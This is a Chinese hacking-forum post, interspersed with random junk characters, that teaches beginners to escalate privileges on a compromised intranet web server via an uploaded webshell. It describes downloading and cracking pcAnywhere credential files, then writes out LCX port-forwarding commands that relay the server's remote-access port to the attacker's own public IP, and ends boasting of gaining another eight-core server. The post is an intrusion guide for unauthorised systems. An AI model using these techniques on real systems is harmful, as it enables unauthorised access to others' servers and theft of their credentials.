- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
2 |2 n) q! ~% W. Y3 C3 u$ T% \/ \' a$ t+ L" ]; e% j) X. V
提权方法:pcanywhere+LCX
2 u2 A0 p$ J$ g8 D; U
J6 j) |$ Z/ K获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。4 _$ L7 O2 q" A2 `" f
0 _( b$ a9 @" ~5 A
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。( }+ Y, x* q% W+ o
0 c9 y& K. E1 ^1 w) L
/ W5 v2 f3 {6 f# k' ~' G) z% s1 E% V查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。2 j% R, B$ J5 s+ q, V) A' O$ X
: K. l. z3 r& i" o3 J
! I: ?# i6 W7 p! _3 v+ c9 a& R
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
4 O+ U% l3 a) H, Z% S
) W: B' }1 S# C% y: N
1 W h& P* k2 F2 @/ v& h$ G
, l4 v {5 l. d. W
4 a, C- P4 J* G5 k' W9 m由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` F- y7 Q2 c3 v' Q0 v
* Z' `: l P4 C$ H# y
. T( \' L' V& TLCX的用法再简单说下:
: c1 E( l' J7 p& y0 |6 w. v+ t# Q$ s& R& }! o& h) ~" e
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)# u4 D% w2 j! q2 B# `" D" g- ]9 w
& l$ Q& F6 U: S* I本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
0 y3 _! D1 i9 S' h2 Y( U3 M2 [8 m) M- |1 W
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。1 v3 b' F8 X7 B+ I' Z4 k7 v
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``% A0 d5 w( b4 L$ l3 g, [
5 {( g( H4 N3 e$ K3 n
( h% C% v& h( M6 u# T! U' F) M/ I% u1 K! ?4 s: r8 H
1 j9 d; r+ k" K0 S; t4 a呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
4 D- V* q7 ^- b2 _7 n& V
7 ~9 Z. o0 {; V" {) ] a
, K7 j# n0 v, j* s( @ I- r: H, Z, p" D* A% X, S
4 Z6 e( U% n6 e+ w" x* E
我们本地连接试试,输入我们刚破解的账号密码9 r8 F+ }6 d% _& j; _
- {& ~2 Z5 Z5 @; _, b4 H: ~3 \* w, E; U
呵呵``连接成功,服务器不错,又一个8核^︵^
! l4 G6 E4 M1 p9 w/ i' E; j$ e( V3 n4 k" v3 [9 p
6 c, t1 J) k# S+ K# K
5 h' T) g( p# O3 }1 N1 V- } |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|